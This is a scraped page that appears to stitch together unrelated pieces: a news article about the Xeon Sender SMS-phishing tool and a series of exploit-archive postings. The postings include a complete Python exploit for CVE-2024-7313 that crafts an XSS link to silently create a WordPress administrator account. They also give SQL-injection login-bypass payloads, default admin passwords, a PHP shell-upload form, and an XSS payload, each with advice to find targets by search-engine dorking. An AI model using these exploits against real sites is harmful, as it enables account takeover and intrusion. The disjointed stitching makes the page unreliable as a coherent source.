Malicious actors are using a cloud attack tool named Xeon Sender to conduct SMS phishing and spam campaigns on a large scale by abusing legitimate services.
"Attackers can use Xeon to send messages through multiple software-as-a-service (SaaS) providers using valid credentials for the service providers," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News.

Cloud Security / Threat Intelligence

Malicious actors are using a cloud attack tool named Xeon Sender to conduct SMS phishing and spam campaigns on a large scale by abusing legitimate services.

"Attackers can use Xeon to send messages through multiple software-as-a-service (SaaS) providers using valid credentials for the service providers," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News.

Examples of the services used to facilitate the en masse distribution of SMS messages include Amazon Simple Notification Service (SNS), Nexmo, Plivo, Proovl, Send99, Telesign, Telnyx, TextBelt, Twilio.

It's important to note here that the activity does not exploit any inherent weaknesses in these providers. Rather, the tool uses legitimate APIs to conduct bulk SMS spam attacks.

It joins tools like SNS Sender that have increasingly become a way to send bulk smishing messages and ultimately capture sensitive information from targets.

Distributed via Telegram and hacking forums, with one of the older versions crediting a Telegram channel devoted to advertising cracked hacktools. The most recent version, available for download as a ZIP file, attributes itself to a Telegram channel named Orion Toolxhub (oriontoolxhub) that has 200 members.

Orion Toolxhub was created on February 1, 2023. It has also freely made available other software for brute-force attacks, reverse IP address lookups, and others such as a WordPress site scanner, a PHP web shell, a Bitcoin clipper, and a program called YonixSMS that purports to offer unlimited SMS sending capabilities.

Xeon Sender is also referred to as XeonV5 and SVG Sender. Early versions of the Python-based program have been detected as early as 2022. It has since been repurposed by several threat actors for their own purposes.

"Another incarnation of the tool is hosted on a web server with a GUI," Delamotte said. "This hosting method removes a potential barrier to access, enabling lower skilled actors who may not be comfortable with running Python tools and troubleshooting their dependencies."

Xeon Sender, regardless of the variant used, offers its users a command-line interface that can be used to communicate with the backend APIs of the chosen service provider and orchestrate bulk SMS spam attacks.

This also means that the threat actors are already in possession of the necessary API keys required to access the endpoints. The crafted API requests also include the sender ID, the message contents, and one of the phone numbers selected from a predefined list present in a text file.

Xeon Sender, besides its SMS sending methods, incorporates features to validate Nexmo and Twilio account credentials, generate phone numbers for a given country code and area code, and check if a provided phone number is valid.

Despite a lack of finesse associated with the tool, SentinelOne said the source code is replete with ambiguous variables like single letters or a letter plus a number to make debugging a lot more challenging.

"Xeon Sender largely uses provider-specific Python libraries to craft API requests, which presents interesting detection challenges," Delamotte said. "Each library is unique, as are the provider's logs. It may be difficult for teams to detect abuse of a given service."

"To defend against threats like Xeon Sender, organizations should monitor activity related to evaluating or modifying SMS sending permissions or anomalous changes to distribution lists, such as a large upload of new recipient phone numbers."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Xeon Sender Tool Exploits Cloud APIs for Large-Scale SMS Phishing Attacks

WordPress Shield Security plugin versions 20.0.5 and below cross site scripting exploit that adds an administrative user.

# Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation  
# Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK)  
# Date: 16/08/2024  
# Exploit Author: Tim Lepp  
# Vendor Homepage: https://getshieldsecurity.com/  
# Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5)  
# Version: <20.0.6  
# Tested on: Ubuntu  
# CVE : CVE-2024-7313

How It Works

  *   The script first checks if the target WordPress installation is using a vulnerable version of the Shield Security plugin by examining the response from the wp-login.php page.  
  *   If the plugin version is vulnerable, it proceeds to generate a reflected XSS payload that, when executed, will create a new admin user with a hardcoded password as WordPress wont accept weak passwords without user intervention.  
  *   The payload is created to first use a GET request to dynamically find the WordPress nonce used for account creation, then use that nonce to submit a POST request to the user creation endpoint with the details of the new user given in the script.  
  *  
The payload is then URL-encoded and displayed for use in the attack.  
  *  
Once sent to an administrator of the site and the link is clicked, a new Administrator user will be created on the site with the details parsed by the script. This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background.

Reference  
https://research.cleantalk.org/cve-2024-7313/

Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main

--- code ---

import sys  
import urllib.parse  
import requests  
from bs4 import BeautifulSoup

# Color codes for terminal output  
red = '\033[91m'  
green = '\033[92m'  
yellow = '\033[93m'  
blue = '\033[96m'  
purple = '\033[95m'  
reset = '\033[0m'

# Banner and vulnerability information - Displayed at the start of the script  
def print_banner():  
    print(f"""{red}  
#############################################################################  
#                                                                           #  
#                                                                           #  
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #  
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #  
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #  
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #  
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #  
#                                                                           #  
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #  
#    Reflected XSS in WordPress Shield Security Plugin                      #  
#    Versions Affected: < 20.0.6                                            #  
#    Risk: High                                                             #  
#    Discovered by: Wayne-Kerr                                              #  
#    Published: August 7, 2024                                              #  
#############################################################################   
    {reset}""")

# Help menu - Provides instructions when '-h' or '--help' is used  
def print_help():  
    print(f"""{yellow}  
Usage: python3 exploit.py <target_url>

Example:  
    python3 exploit.py http://example.com

Options:  
    -h, --help    Show this help message and exit  
{reset}""")

# Format the target URL - Ensures the URL starts with "http://" or "https://"  
def format_target_url(target_url):  
    if target_url.startswith("http://") or target_url.startswith("https://"):  
        return target_url  
    else:  
        return f"http://{target_url}"

# Check if the target is vulnerable by accessing the wp-login.php page  
def check_vulnerability(target_url):  
    try:  
        response = requests.get(f"{target_url}/wp-login.php")  
        if response.status_code == 200:  
            # Try to extract version information from the response  
            version_info = response.text.split("ver=")[-1].split("\"")[0]  
            version = version_info.split(".")  
            major_version = int(version[0])  
            minor_version = int(version[1])  
            patch_version = int(version[2].split('&')[0])

            # Check if the version is below 20.0.6  
            if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6):  
                print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}")  
                return True  
            else:  
                print(f"{yellow}Version not vulnerable.{reset}")  
                return False  
        else:  
            print(f"{red}Failed to retrieve the version information.{reset}")  
            return False  
    except Exception as e:  
        print(f"{red}Error occurred while checking vulnerability: {e}{reset}")  
        return False

# Generate the XSS payload URL that exploits the vulnerability  
def generate_xss_payload(target_url, username, email, first_name, last_name):  
    # Hardcoded password for the new admin account to be created  
    hardcoded_password = "HaxorStrongAFPassword123!!"

    # The payload template for the XSS attack  
    payload_template = (  
        "var xhrNonce = new XMLHttpRequest(); "  
        "xhrNonce.open('GET', '/wp-admin/user-new.php', true); "  
        "xhrNonce.onload = function() {{ "  
        "if (xhrNonce.status === 200) {{ "  
        "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; "  
        "var xhr = new XMLHttpRequest(); "  
        "xhr.open('POST', '/wp-admin/user-new.php', true); "  
        "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); "  
        "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); "  
        "xhr.setRequestHeader('Origin', '{target}'); "  
        "var params = 'action=createuser&_wpnonce_create-user=' + nonce + "  
        "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php"  
        "&user_login={username}&email={email}"  
        "&first_name={first_name}&last_name={last_name}&url=test"  
        "&pass1={password}&pass2={password}&role=administrator"  
        "&createuser=Add+New+User'; "  
        "xhr.send(params); "  
        "xhr.onload = function() {{ "  
        "if (xhr.status == 200) {{ "  
        "console.log('Admin user created successfully'); "  
        "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; "  
        "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} "  
        "}}; "  
        "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; "  
        "xhrNonce.send();"  
    )

    # Formatting the payload with the provided details  
    payload = payload_template.format(  
        target=target_url,  
        username=username,  
        email=urllib.parse.quote(email),  
        first_name=first_name,  
        last_name=last_name,  
        password=urllib.parse.quote(hardcoded_password)  
    )

    # URL encode the payload and generate the full URL for the XSS attack  
    encoded_payload = urllib.parse.quote(f"<script>{payload}</script>")  
    full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}"

    return full_url

if __name__ == "__main__":  
    try:  
        # Print the banner  
        print_banner()

        # Check for help menu flag and print help if necessary  
        if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:  
            print_help()  
            sys.exit(0)

        # Get the target URL from the command-line argument  
        raw_target_url = sys.argv[1]  
        target_url = format_target_url(raw_target_url)

        # Check if the target is vulnerable  
        if not check_vulnerability(target_url):  
            sys.exit(1)

        # Get user input for the new admin account details  
        username = input(f"{blue}Enter username: {reset}")  
        email = input(f"{blue}Enter email: {reset}")  
        first_name = input(f"{blue}Enter first name: {reset}")  
        last_name = input(f"{blue}Enter last name: {reset}")

        # Display the hardcoded password  
        hardcoded_password = "HaxorStrongAFPassword123!!"  
        print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}")

        # Generate and display the XSS payload URL  
        xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name)  
        print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}")

    # Handle keyboard interruption  
    except KeyboardInterrupt:  
        print(f"\n{red}Script interrupted by user.{reset}")  
        sys.exit(1)  
    # Catch any other exceptions and display an error message  
    except Exception as e:  
        print(f"{red}An error occurred: {e}{reset}")  
        sys.exit(1)

WordPress Shield Security 20.0.5 Cross Site Scripting

Insurance version 1.2 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Insurance 1.2 Insecure Settings Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/insurance/                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/insurance/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Insurance 1.2 Insecure Settings

Human Resource Management System 2024 version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 auth by pass Vulnerability                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user =  'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/hrm/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Human Resource Management System 2024 1.0 SQL Injection

Hotel Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Hotel Management System 1.0 auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use Payload : user&pass = ' or 0=0 ##[+] http://127.0.0.1/hotel/admin/index.php?page=homeGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Hotel Management System 1.0 SQL Injection

Hotel Booking System version 1.0 suffers from a remote shell upload vulnerability.

=============================================================================================================================================  
| # Title     : Hotel Booking System 1.0 Remote File Upload Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel.zip                                             |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload malicious PHP files directly.

[+] Line 9 set url of target.

[+] The path to upload the files : http://127.0.0.1/hotel/uploadImage\Profile

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Image Upload Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/source%20code/profile.php" method="POST" enctype="multipart/form-data">  
        <label for="image">Upload an image:</label>  
        <input type="file" id="image" name="image" accept="image/*" required>  
        <button type="submit" name="btn_update">Upload</button>  
    </form>  
</body>  
</html>

[+] part 2 : infected item ( manage_website.php ) .

[+] Line 9 set url of target.

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Update Website Images</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/source%20code/manage_website.php" method="POST" enctype="multipart/form-data">  
        <input type="hidden" name="old_website_image" value="current_website_image.jpg">  
        <label for="website_image">Upload new website image:</label>  
        <input type="file" id="website_image" name="website_image" accept="image/*">

                <input type="hidden" name="old_login_image" value="current_login_image.jpg">  
        <label for="login_image">Upload new login image:</label>  
        <input type="file" id="login_image" name="login_image" accept="image/*">

                <input type="hidden" name="old_back_login_image" value="current_back_login_image.jpg">  
        <label for="back_login_image">Upload new back login image:</label>  
        <input type="file" id="back_login_image" name="back_login_image" accept="image/*">

                <button type="submit" name="btn_web">Update Images</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hotel Booking System 1.0 Shell Upload

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

**Home Owners Collection Management System 1.0 Insecure Settings**

Posted Aug 16, 2024

Authored by indoushka

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 94fb8d8c82f8132953cb67c97a9b682c8e63a436a475a575173b89ddf54daa9f

Download | Favorite | View

**Home Owners Collection Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Home Owners Collection Management System v1.0 Insecure Settings Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Home Owners Collection Management System 1.0 Insecure Settings

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

Posted Aug 16, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 98c12c7a5556d4399b71f053e8f21eaf5c59e49e15d4bf7f6b1980de56fec3c2

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 IDOR Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /dashboard/autoupdate[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference

Feberr version 13.4 suffers from an ignored default credential vulnerability.

**Feberr 13.4 Insecure Settings**

Posted Aug 15, 2024

Authored by indoushka

Feberr version 13.4 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2e393c441ce609493774dac1c3e5f681c5ce98d1b3702bb114041fdb03335768

Download | Favorite | View

**Feberr 13.4 Insecure Settings**

    ====================================================================================================================================| # Title     : Feberr v13.4 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user&pass: admin[+] https://www/127.0.0.1/nexuscriptscom/admin/pwa-settingsGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Feberr 13.4 Insecure Settings

Farmacia Gama version 1.0 suffers from a cross site scripting vulnerability.

**Farmacia Gama 1.0 Cross Site Scripting**

Posted Aug 15, 2024

Authored by indoushka

Farmacia Gama version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2caf36ad25ddb5e5fcd4a26fd8ac2e62e0dee3d76fbd95e698130d2b8730632e

Download | Favorite | View

**Farmacia Gama 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 XSS Vulnerability                                                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendas[+] http://127.0.0.1/farmacia-master/main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendasGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Tag

#php